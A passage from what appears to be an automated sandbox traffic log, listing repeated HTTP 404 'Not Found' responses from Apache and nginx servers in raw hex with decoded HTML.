0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; marg
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:33:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:33:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:33:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:33:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:34:04 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:34:07 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:34:12 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:34:14 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:34:26 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 72 75 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nrup/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:34:28 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 72 75 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nrup/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:34:31 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 72 75 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nrup/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:34:34 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 72 75 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nrup/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 03 May 2024 09:34:39 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 03 May 2024 09:34:42 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
